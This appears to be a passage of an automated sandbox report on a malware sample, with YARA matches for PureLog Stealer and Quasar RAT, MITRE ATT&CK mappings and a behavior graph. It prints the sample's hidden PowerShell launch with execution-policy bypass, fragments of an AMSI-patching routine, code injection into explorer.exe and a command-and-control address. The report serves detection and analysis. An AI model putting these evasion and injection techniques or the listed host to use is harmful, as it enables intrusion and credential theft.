              Source: svchost.exe, 00000006.00000000.1390078269.0000023359743000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 229FKOX3 VMCI Bus Device
              Source: svchost.exe, 00000006.00000000.1390138450.000002335978B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntityMicrosoft Hyper-V Generation Counter{4d36e97d-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityMicrosoft Hyper-V Generation CounterACPI\VMW0001\7System.String[]MicrosoftMicrosoft Hyper-V Generation CounterSystemACPI\VMW0001\7gencounterOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
              Source: svchost.exe, 00000006.00000000.1390670833.0000023359D71000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: svchost.exe, 00000006.00000000.1390078269.0000023359743000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AC9SPRRK VMCI Bus Device
              Source: svchost.exe, 00000006.00000000.1390078269.0000023359743000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_PnPEntity6LU2AGRR VMCI Bus Device{4d36e97d-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntity229FKOX3 VMCI Bus DevicePCI\LS1LLG1N&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FSystem.String[]VMware, Inc.AC9SPRRK VMCI Bus DeviceSystemPCI\THLU3ZGM&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FvmciOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
              Source: svchost.exe, 00000006.00000000.1389598483.00000233593A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1572016071.00000233593AA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1576483229.00000233593AF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Members of this group have complete and unrestricted access to all features of Hyper-V.
              Source: svchost.exe, 00000006.00000000.1389598483.00000233593A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1572016071.00000233593AA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nd unrestricted access to all features of Hyper-V.
              Source: svchost.exe, 00000006.00000000.1389598483.00000233593A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1572016071.00000233593AA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1576483229.00000233593AF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Win32_GroupS-1-5-32-578user-PCuser-PC\Hyper-V AdministratorsHyper-V AdministratorsMembers of this group have complete and unrestricted access to all features of Hyper-V.OK
              Source: svchost.exe, 00000006.00000000.1389598483.00000233593A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1572016071.00000233593AA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1576483229.00000233593AF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 15.204.213.5 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 85.192.49.163 4782Jump to behavior
              .NET source code references suspicious native API functions
              Source: 2.2.powershell.exe.2320691d278.1.raw.unpack, AmsiPatcher.csReference to suspicious API methods: OpenProcess(56u, bInheritHandle: false, pid)
              Source: 2.2.powershell.exe.2320691d278.1.raw.unpack, AmsiPatcher.csReference to suspicious API methods: LoadLibraryA("amsi.dll")
              Source: 2.2.powershell.exe.2320691d278.1.raw.unpack, AmsiPatcher.csReference to suspicious API methods: GetProcAddress(intPtr2, "AmsiOpenSession")
              Source: 2.2.powershell.exe.2320691d278.1.raw.unpack, AmsiPatcher.csReference to suspicious API methods: ReadProcessMemory(intPtr, procAddress, array, array.Length, IntPtr.Zero)
              Source: 2.2.powershell.exe.2320691d278.1.raw.unpack, AmsiPatcher.csReference to suspicious API methods: WriteProcessMemory(intPtr, new IntPtr(value), patch, patch.Length, IntPtr.Zero)
              Bypasses PowerShell execution policy
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1"
              Creates a thread in another existing process (thread injection)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 104F0000Jump to behavior
              Injects code into the Windows Explorer (explorer.exe)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3084 base: 104F0000 value: E8Jump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF839063843Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF839063843Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 104F0000Jump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD89C.tmp" "c:\Users\user\AppData\Local\Temp\akylvhfm\CSC15D32CA6BA724B45B0CB2F57F81BE153.TMP"Jump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeQueries volume information: C:\Users\user\Desktop\PI1qW7yV9K.exe VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected PureLog Stealer
              Source: Yara matchFile source: PI1qW7yV9K.exe, type: SAMPLE
              Source: Yara matchFile source: 2.2.powershell.exe.2321d350000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.2321d350000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PI1qW7yV9K.exe.3d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.23216460cf8.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.23216460cf8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.1712421715.000002321D350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1548348801.0000023216460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1332889262.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Yara detected Quasar RAT
              Source: Yara matchFile source: 8.2.explorer.exe.92b0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.explorer.exe.92b0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2686215912.0000000020B03000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2648853929.00000000092B0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected PureLog Stealer
              Source: Yara matchFile source: PI1qW7yV9K.exe, type: SAMPLE
              Source: Yara matchFile source: 2.2.powershell.exe.2321d350000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.2321d350000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.PI1qW7yV9K.exe.3d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.23216460cf8.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.23216460cf8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.1712421715.000002321D350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1548348801.0000023216460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1332889262.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Yara detected Quasar RAT
              Source: Yara matchFile source: 8.2.explorer.exe.92b0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.explorer.exe.92b0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.explorer.exe.290a0000.17.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.explorer.exe.290a0000.17.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.2689977678.00000000290A0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2686215912.0000000020B03000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2648853929.00000000092B0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		OS Credential Dumping2
              File and Directory Discovery              		Remote Services11
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		Boot or Logon Initialization Scripts411
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory33
              System Information Discovery              		Remote Desktop ProtocolData from Removable Media11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell              		Logon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information              		Security Account Manager221
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Software Packing              		NTDS51
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp              		LSA Secrets2
              Process Discovery              		SSHKeylogging13
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              File Deletion              		DCSync1
              System Network Configuration Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Masquerading              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron411
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
              Hidden Files and Directories              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1665177 Sample: PI1qW7yV9K.exe Startdate: 15/04/2025 Architecture: WINDOWS Score: 100 42 pki-goog.l.google.com 2->42 44 ipwho.is 2->44 46 2 other IPs or domains 2->46 52 Malicious sample detected (through community Yara rule) 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Yara detected PureLog Stealer 2->56 58 8 other signatures 2->58 9 PI1qW7yV9K.exe 3 2->9         started        signatures3 process4 file5 34 ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1, ASCII 9->34 dropped 36 C:\Users\user\AppData\...\PI1qW7yV9K.exe.log, CSV 9->36 dropped 68 Suspicious powershell command line found 9->68 70 Bypasses PowerShell execution policy 9->70 13 powershell.exe 22 9->13         started        17 conhost.exe 9->17         started        signatures6 process7 file8 40 C:\Users\user\AppData\...\akylvhfm.cmdline, Unicode 13->40 dropped 72 Injects code into the Windows Explorer (explorer.exe) 13->72 74 Writes to foreign memory regions 13->74 76 Creates a thread in another existing process (thread injection) 13->76 19 explorer.exe 49 3 13->19 injected 23 svchost.exe 13->23 injected 25 csc.exe 3 13->25         started        28 2 other processes 13->28 signatures9 process10 dnsIp11 48 85.192.49.163, 4782, 49692, 49697 DINET-ASRU Russian Federation 19->48 50 ipwho.is 15.204.213.5, 443, 49695 HP-INTERNET-ASUS United States 19->50 60 System process connects to network (likely due to code injection or exploit) 19->60 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->62 64 Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes) 23->64 66 Queries temperature or sensor information (via WMI often done to detect virtual machines) 23->66 30 WMIADAP.exe 4 23->30         started        38 C:\Users\user\AppData\Local\...\akylvhfm.dll, PE32 25->38 dropped 32 cvtres.exe 1 25->32         started        file12 signatures13 process14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.